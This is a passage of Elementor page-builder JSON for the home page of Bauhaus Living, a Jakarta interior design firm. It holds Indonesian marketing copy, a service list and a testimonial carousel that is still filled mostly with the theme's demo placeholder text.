\"px\",\"top\":\"0\",\"right\":\"10\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false}},\"elements\":[{\"id\":\"2659e25\",\"elType\":\"widget\",\"settings\":{\"sub_title\":\"ABOUT US\",\"title\":\"WELCOME TO BAUHAUS\",\"align_heading\":\"left\",\"margin_title\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"23\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"retirio_elementor_heading\"},{\"id\":\"d5a8088\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Tingkatkan Kualitas Hidup Anda dengan Bauhaus Living!<\\/p>\",\"text_color\":\"#050404\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":18,\"sizes\":[]},\"typography_font_weight\":\"bold\",\"_padding\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"0\",\"bottom\":\"5\",\"left\":\"30\",\"isLinked\":false},\"_border_border\":\"solid\",\"_border_width\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"4\",\"isLinked\":false},\"_border_color\":\"#E3B25A\",\"_background_background\":\"classic\",\"_background_color\":\"#FDFDFD\",\"_box_shadow_box_shadow_type\":\"yes\",\"_box_shadow_box_shadow\":{\"horizontal\":5,\"vertical\":6,\"blur\":10,\"spread\":-3,\"color\":\"rgba(0, 0, 0, 0.32)\"}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"ae9c19e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Sejak tahun 2005, Bauhaus Living telah menjadi pilihan utama untuk solusi desain interior berkualitas tinggi di Jakarta dan sekitarnya. Dengan pengalaman yang telah teruji dalam menangani lebih dari 300 proyek residential dan commercial, kami siap membawa keindahan, kenyamanan, dan kepribadian ke dalam ruang Anda.<\\/p><p>Kami tidak hanya menciptakan desain interior yang estetis, tetapi juga mengubah ruang tempat tinggal atau tempat kerja Anda menjadi cerminan karakter dan selera pribadi Anda.<\\/p><p>Setiap proyek kami adalah sebuah karya seni yang unik, menggabungkan fungsionalitas dengan gaya, sehingga menciptakan lingkungan yang memikat dan berkelas.<\\/p><p>maupun tempat kerja agar selain nyaman juga mewakili kepribadian penghuninya.<\\/p>\",\"_margin\":{\"unit\":\"px\",\"top\":\"10\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"95d1537\",\"elType\":\"widget\",\"settings\":{\"text\":\"More\",\"background_color\":\"#E3B25A\",\"text_padding\":{\"unit\":\"px\",\"top\":\"20\",\"right\":\"40\",\"bottom\":\"20\",\"left\":\"40\",\"isLinked\":false},\"_margin\":{\"unit\":\"px\",\"top\":\"20\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"link\":{\"url\":\"https:\\/\\/bauhaus.futuremediatrix.com\\/about\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]},\"typography_font_weight\":\"700\",\"typography_text_transform\":\"uppercase\",\"border_radius\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"_z_index\":2,\"_transform_keep_proportions_hover\":\"\",\"_transform_skewX_effect_hover\":{\"unit\":\"px\",\"size\":105,\"sizes\":[]},\"__dynamic__\":[]},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"89e3b46\",\"elType\":\"section\",\"settings\":{\"gap\":\"no\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"80\",\"left\":0,\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"90\",\"right\":\"10\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false},\"background_color\":\"#F5F5F5\",\"background_overlay_background\":\"classic\",\"background_overlay_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/background-service-home-1.png\",\"id\":3938,\"alt\":\"\",\"source\":\"library\"},\"background_overlay_position\":\"center center\",\"background_overlay_repeat\":\"no-repeat\",\"background_overlay_size\":\"cover\",\"background_overlay_opacity\":{\"unit\":\"px\",\"size\":0.05,\"sizes\":[]},\"overlay_blend_mode\":\"darken\",\"padding\":{\"unit\":\"px\",\"top\":\"120\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"background_background\":\"classic\"},\"elements\":[{\"id\":\"689d32b\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"6fd54ec\",\"elType\":\"section\",\"settings\":{\"gap\":\"no\",\"structure\":\"20\",\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"25\",\"left\":\"0\",\"isLinked\":false},\"animation\":\"ova-flip\",\"animation_tablet\":\"none\",\"animation_duration\":\"fast\",\"animation_delay\":500},\"elements\":[{\"id\":\"afefcf5\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":57.862},\"elements\":[{\"id\":\"41871d7\",\"elType\":\"widget\",\"settings\":{\"sub_title\":\"SERVICES WE DO\",\"title\":\"\\n interior design consultant & contractor \",\"align_heading\":\"left\"},\"elements\":[],\"widgetType\":\"retirio_elementor_heading\"}],\"isInner\":true},{\"id\":\"8ca80a9\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":42.097,\"align\":\"flex-start\",\"margin\":{\"unit\":\"px\",\"top\":\"40\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"30\",\"isLinked\":false},\"margin_mobile\":{\"unit\":\"px\",\"top\":\"40\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"67cca64\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>- Konsultasi perencanaan &amp; interior design<\\/p><p>- Penyusunan Rencana Anggaran Belanja<\\/p><p>- Produksi furniture dan pekerjaan sipil<\\/p>\",\"text_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_element_width\":\"auto\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"0da118d\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"5d9734c\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"77ba3ef\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":100,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"b51484b\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"gap\":\"no\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"-15\",\"left\":0,\"isLinked\":false},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"\",\"right\":0,\"bottom\":\"\",\"left\":0,\"isLinked\":true},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"3d8a96c\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"0f00906\",\"elType\":\"widget\",\"settings\":{\"sub_title\":\"our recent work\",\"title\":\"Introducing outstanding new projects\"},\"elements\":[],\"widgetType\":\"retirio_elementor_heading\"},{\"id\":\"f665bb7\",\"elType\":\"widget\",\"settings\":{\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"-120\",\"left\":\"0\",\"isLinked\":false},\"_animation\":\"pulse\",\"_animation_tablet\":\"none\",\"animation_duration\":\"slow\",\"post_per_page\":3,\"order_by\":\"ova_sev_met_order_sev\",\"order\":\"ASC\",\"target_blank\":\"\"},\"elements\":[],\"widgetType\":\"ovasev_elementor_service_box\"},{\"id\":\"b4fd990\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"ova_elementor_project_filter_2\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"145a686\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\",\"background_background\":\"classic\",\"background_color\":\"#242424\",\"background_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/bg-whychoose.png\",\"id\":2116,\"alt\":\"\",\"source\":\"library\"},\"background_position\":\"center left\",\"background_repeat\":\"no-repeat\",\"background_size\":\"contain\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"gap\":\"no\",\"padding_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"10\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false}},\"elements\":[{\"id\":\"8460a70\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":45,\"padding\":{\"unit\":\"px\",\"top\":\"110\",\"right\":\"80\",\"bottom\":\"120\",\"left\":\"0\",\"isLinked\":false},\"_inline_size_tablet\":100,\"padding_tablet\":{\"unit\":\"px\",\"top\":\"90\",\"right\":\"0\",\"bottom\":\"90\",\"left\":\"0\",\"isLinked\":false},\"space_between_widgets\":15},\"elements\":[{\"id\":\"5229c85\",\"elType\":\"widget\",\"settings\":{\"sub_title\":\"our benefits\",\"title\":\"Why Bauhaus Living ?\",\"description\":\"Setiap proyek kami adalah sebuah karya seni yang unik, menggabungkan fungsionalitas dengan gaya, sehingga menciptakan lingkungan yang memikat dan berkelas.\",\"align_heading\":\"left\",\"color_title\":\"#FFFFFF\",\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"color_sub_title\":\"#B1B1B1\",\"color_description\":\"#C2C2C2\",\"show_line_text\":\"\"},\"elements\":[],\"widgetType\":\"retirio_elementor_heading\"},{\"id\":\"e6bce61\",\"elType\":\"widget\",\"settings\":{\"icon_list\":[{\"text\":\"Konsultasi gratis oleh team profesional\",\"selected_icon\":{\"value\":\"ovaicon ovaicon-next-5\",\"library\":\"ovaicon\"},\"_id\":\"7113fdf\"},{\"text\":\"Interior design yang mewakili keunikan setiap klien\",\"selected_icon\":{\"value\":\"ovaicon ovaicon-next-5\",\"library\":\"ovaicon\"},\"_id\":\"e6ab069\"},{\"text\":\"Design + Build Service menjadi kualitas pekerjaan \",\"selected_icon\":{\"value\":\"ovaicon ovaicon-next-5\",\"library\":\"ovaicon\"},\"_id\":\"5d551b6\"}],\"icon_color\":\"#E3B25A\",\"icon_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"text_color\":\"#FFFFFF\",\"icon_typography_typography\":\"custom\",\"icon_typography_font_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"icon_typography_font_weight\":\"600\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"16\",\"left\":\"0\",\"isLinked\":false},\"icon_typography_line_height\":{\"unit\":\"em\",\"size\":0.6,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"icon-list\"},{\"id\":\"9c7a64c\",\"elType\":\"widget\",\"settings\":{\"title\":\"Kepuasan Pelanggan\",\"percent\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"inner_text\":\"\",\"bar_color\":\"#E3B25A\",\"bar_bg_color\":\"#3A3A3A\",\"bar_height\":{\"unit\":\"px\",\"size\":8,\"sizes\":[]},\"title_color\":\"#FFFFFF\",\"bar_border_radius\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":19,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"progress\"},{\"id\":\"042a87b\",\"elType\":\"widget\",\"settings\":{\"title\":\"Kualitas Hasil dan Layanan\",\"percent\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"inner_text\":\"\",\"bar_color\":\"#E3B25A\",\"bar_bg_color\":\"#3A3A3A\",\"bar_height\":{\"unit\":\"px\",\"size\":8,\"sizes\":[]},\"title_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":19,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"progress\"}],\"isInner\":false},{\"id\":\"2ae20b7\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":55,\"background_image\":{\"url\":\"\",\"id\":\"\",\"alt\":\"\",\"source\":\"library\"},\"background_position\":\"center center\",\"background_repeat\":\"no-repeat\",\"background_size\":\"contain\",\"css_classes\":\"retirio_stretch_column_right\",\"_inline_size_tablet\":100,\"padding_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"20\",\"bottom\":\"20\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"20\",\"bottom\":\"20\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"ca11226\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bauhaus.futuremediatrix.com\\/wp-content\\/uploads\\/2023\\/05\\/IMG-5878-scaled.jpg\",\"id\":4796,\"alt\":\"\",\"source\":\"library\"},\"align\":\"right\",\"width_tablet\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"height\":{\"unit\":\"px\",\"size\":580,\"sizes\":[]},\"object-fit_tablet\":\"cover\",\"image_size\":\"full\",\"_transform_transition_hover\":{\"unit\":\"px\",\"size\":800,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"458230c\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#F5F5F5\",\"padding\":{\"unit\":\"px\",\"top\":\"110\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"80\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"be465bf\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"0c50faf\",\"elType\":\"widget\",\"settings\":{\"sub_title\":\"Real Testimonials\",\"title\":\"Apa kata mereka tentang Bauhaus?\",\"margin_title\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"-17\",\"left\":\"0\",\"isLinked\":false},\"_padding\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"25\",\"bottom\":\"0\",\"left\":\"25\",\"isLinked\":false},\"_padding_tablet\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"10\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false},\"_padding_mobile\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"_animation\":\"fadeInUp\",\"_animation_tablet\":\"none\"},\"elements\":[],\"widgetType\":\"retirio_elementor_heading\"},{\"id\":\"27fa0e5\",\"elType\":\"widget\",\"settings\":{\"version\":\"version_1\",\"tab_item\":[{\"name_author\":\"Prijonno Nugroho\",\"job\":\"Action Coach Jakarta\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"_id\":\"4735f8c\",\"image_author\":{\"url\":\"https:\\/\\/bauhaus.futuremediatrix.com\\/wp-content\\/uploads\\/2023\\/09\\/56947243_2426566684042502_6812443397089918976_n.jpg\",\"id\":4923,\"alt\":\"\",\"source\":\"library\"},\"background_image_background\":\"classic\",\"background_image_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/Base.png\",\"id\":1421,\"alt\":\"\",\"source\":\"library\"},\"background_image_position\":\"initial\",\"background_image_position_tablet\":\"initial\",\"background_image_position_mobile\":\"initial\",\"background_image_xpos\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"background_image_xpos_tablet\":{\"unit\":\"px\",\"size\":45,\"sizes\":[]},\"background_image_xpos_mobile\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"background_image_ypos\":{\"unit\":\"%\",\"size\":103,\"sizes\":[]},\"background_image_ypos_tablet\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]},\"background_image_repeat\":\"no-repeat\",\"background_image_repeat_mobile\":\"no-repeat\",\"background_image_size\":\"contain\",\"background_image_size_tablet\":\"cover\",\"background_image_size_mobile\":\"cover\",\"background_color_item\":\"#1B1B1B\"},{\"name_author\":\"Kevin martin\",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"image_author\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/kevin-martin.jpg\",\"id\":1415,\"alt\":\"\",\"source\":\"library\"},\"background_image_background\":\"classic\",\"background_image_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/Base.png\",\"id\":1421,\"alt\":\"\",\"source\":\"library\"},\"background_image_position\":\"initial\",\"background_image_position_tablet\":\"initial\",\"background_image_position_mobile\":\"initial\",\"background_image_xpos\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"background_image_xpos_tablet\":{\"unit\":\"px\",\"size\":45,\"sizes\":[]},\"background_image_xpos_mobile\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"background_image_ypos\":{\"unit\":\"%\",\"size\":103,\"sizes\":[]},\"background_image_ypos_tablet\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]},\"background_image_repeat\":\"no-repeat\",\"background_image_repeat_mobile\":\"no-repeat\",\"background_image_size\":\"contain\",\"background_image_size_tablet\":\"cover\",\"background_image_size_mobile\":\"cover\",\"background_color_item\":\"#1B1B1B\",\"_id\":\"4b2f506\"},{\"name_author\":\"Jessica brown \",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"_id\":\"71b5562\",\"image_author\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/jessica.jpg\",\"id\":1416,\"alt\":\"\",\"source\":\"library\"},\"background_image_background\":\"classic\",\"background_image_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/background-line-yellow.png\",\"id\":1422,\"alt\":\"\",\"source\":\"library\"},\"background_color_item\":\"#DDAD58\"},{\"name_author\":\"Mike hardson\",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"_id\":\"705dd08\",\"image_author\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/mike-hardson.jpg\",\"id\":1417,\"alt\":\"\",\"source\":\"library\"},\"background_image_background\":\"classic\",\"background_image_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/Base.png\",\"id\":1421,\"alt\":\"\",\"source\":\"library\"},\"background_image_repeat\":\"no-repeat\",\"background_image_size\":\"contain\",\"background_color_item\":\"#1B1B1B\"},{\"name_author\":\"Kevin martin\",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"image_author\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/kevin-martin.jpg\",\"id\":1415,\"alt\":\"\",\"source\":\"library\"},\"background_image_background\":\"classic\",\"background_image_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/Base.png\",\"id\":1421,\"alt\":\"\",\"source\":\"library\"},\"background_image_position\":\"initial\",\"background_image_position_tablet\":\"initial\",\"background_image_position_mobile\":\"initial\",\"background_image_xpos\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"background_image_xpos_tablet\":{\"unit\":\"px\",\"size\":45,\"sizes\":[]},\"background_image_xpos_mobile\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"background_image_ypos\":{\"unit\":\"%\",\"size\":103,\"sizes\":[]},\"background_image_ypos_tablet\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]},\"background_image_repeat\":\"no-repeat\",\"background_image_repeat_mobile\":\"no-repeat\",\"background_image_size\":\"contain\",\"background_image_size_tablet\":\"cover\",\"background_image_size_mobile\":\"cover\",\"background_color_item\":\"#1B1B1B\",\"_id\":\"8eb7d44\"},{\"name_author\":\"Mike hardson\",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"image_author\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/mike-hardson.jpg\",\"id\":1417,\"alt\":\"\",\"source\":\"library\"},\"background_image_background\":\"classic\",\"background_image_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/Base.png\",\"id\":1421,\"alt\":\"\",\"source\":\"library\"},\"background_image_repeat\":\"no-repeat\",\"background_image_size\":\"contain\",\"background_color_item\":\"#1B1B1B\",\"_id\":\"23b7d8f\"},{\"name_author\":\"Kevin martin\",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"image_author\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/kevin-martin.jpg\",\"id\":1415,\"alt\":\"\",\"source\":\"library\"},\"background_image_background\":\"classic\",\"background_image_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/Base.png\",\"id\":1421,\"alt\":\"\",\"source\":\"library\"},\"background_image_position\":\"initial\",\"background_image_position_tablet\":\"initial\",\"background_image_position_mobile\":\"initial\",\"background_image_xpos\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"background_image_xpos_tablet\":{\"unit\":\"px\",\"size\":45,\"sizes\":[]},\"background_image_xpos_mobile\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"background_image_ypos\":{\"unit\":\"%\",\"size\":103,\"sizes\":[]},\"background_image_ypos_tablet\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]},\"background_image_repeat\":\"no-repeat\",\"background_image_repeat_mobile\":\"no-repeat\",\"background_image_size\":\"contain\",\"background_image_size_tablet\":\"cover\",\"background_image_size_mobile\":\"cover\",\"background_color_item\":\"#1B1B1B\",\"_id\":\"6c7e338\"}],\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"-280\",\"left\":\"0\",\"isLinked\":false},\"icon_quote\":{\"value\":\"flaticon flaticon-quotes\",\"library\":\"flaticon\"},\"tab_item_v2\":[{\"name_author\":\"Kevin martin\",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"_id\":\"cf6d2b9\"},{\"name_author\":\"Jessica brown \",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"_id\":\"e73dd09\"},{\"name_author\":\"Mike hardson\",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"_id\":\"127b5e7\"}],\"tab_item_v3\":[{\"name_author\":\"Kevin martin\",\"job\":\"Customer\",\"testimonial\":\"This is due to their excellent service, competitive pricing and customer support. It\\u2019s throughly refresing to get such a personal touch. Duis aute lorem ipsum is simply free text irure dolor in velit esse.\",\"_id\":\"163297c\"},{\"name_author\":\"Jessica brown \",\"job\":\"Customer\",\"testimonial\":\"This is due to their excellent service, competitive pricing and customer support. It\\u2019s throughly refresing to get such a personal touch. Duis aute lorem ipsum is simply free text irure dolor in velit esse.\",\"_id\":\"bcfaaf7\"},{\"name_author\":\"Mike hardson\",\"job\":\"Customer\",\"testimonial\":\"This is due to their excellent service, competitive pricing and customer support. It\\u2019s throughly refresing to get such a personal touch. Duis aute lorem ipsum is simply free text irure dolor in velit esse.\",\"_id\":\"80c4005\"}],\"icon_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]},\"dot_control\":\"yes\",\"_animation\":\"bounceInUp\",\"autoplay\":\"\"},\"elements\":[],\"widgetType\":\"retirio_elementor_testimonial\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"f7c9652\",\"elType\":\"section\",\"settings\":{\"padding\":{\"unit\":\"px\",\"top\":\"327\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"297\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"77dbf66\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"080887e\",\"elType\":\"widget\",\"settings\":{\"sub_title\":\"Our process\",\"title\":\"4 easy work steps\",\"_animation\":\"ova-move-down\",\"_margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"60\",\"left\":\"0\",\"isLinked\":false},\"_animation_tablet\":\"none\",\"animation_duration\":\"fast\",\"_animation_delay\":100},\"elements\":[],\"widgetType\":\"retirio_elementor_heading\"},{\"id\":\"ec83ee9\",\"elType\":\"section\",\"settings\":{\"structure\":\"40\",\"margin\":{\"unit\":\"px\",\"top\":\"50\",\"right\":0,\"bottom\":\"120\",\"left\":0,\"isLinked\":false},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"50\",\"right\":0,\"bottom\":\"90\",\"left\":0,\"isLinked\":false},\"margin_mobile\":{\"unit\":\"px\",\"top\":\"40\",\"right\":0,\"bottom\":\"30\",\"left\":0,\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"10\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false}},\"elements\":[{\"id\":\"a992324\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"animation\":\"fadeInDown\",\"animation_tablet\":\"none\",\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/line-1.png\",\"id\":3838,\"alt\":\"\",\"source\":\"library\"},\"background_position\":\"initial\",\"background_xpos\":{\"unit\":\"px\",\"size\":60,\"sizes\":[]},\"background_repeat\":\"no-repeat\",\"padding\":{\"unit\":\"px\",\"top\":\"65\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_inline_size_tablet\":50,\"align_tablet\":\"center\",\"background_position_tablet\":\"initial\",\"background_xpos_tablet\":{\"unit\":\"px\",\"size\":150,\"sizes\":[]},\"background_xpos_mobile\":{\"unit\":\"%\",\"size\":-1000,\"sizes\":[]},\"background_ypos_mobile\":{\"unit\":\"%\",\"size\":-1000,\"sizes\":[]},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false},\"content_position_tablet\":\"top\",\"padding_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"background_ypos\":{\"unit\":\"px\",\"size\":-1,\"sizes\":[]}},\"elements\":[{\"id\":\"fd3636d\",\"elType\":\"widget\",\"settings\":{\"text\":\"Design\\nconcept \\n\",\"numerical_order\":\"01\",\"top_order\":{\"unit\":\"px\",\"size\":-24,\"sizes\":[]},\"right_order\":{\"unit\":\"px\",\"size\":-80,\"sizes\":[]},\"_element_width_mobile\":\"auto\",\"bottom_mobile\":{\"unit\":\"px\",\"size\":175,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"retirio_elementor_ova_icon_box_2\"}],\"isInner\":true},{\"id\":\"b9984a7\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"animation\":\"fadeInDown\",\"animation_tablet\":\"none\",\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/line-2.png\",\"id\":3839,\"alt\":\"\",\"source\":\"library\"},\"background_position\":\"initial\",\"background_xpos\":{\"unit\":\"px\",\"size\":45,\"sizes\":[]},\"background_xpos_tablet\":{\"unit\":\"px\",\"size\":45,\"sizes\":[]},\"background_xpos_mobile\":{\"unit\":\"%\",\"size\":-1000,\"sizes\":[]},\"background_ypos\":{\"unit\":\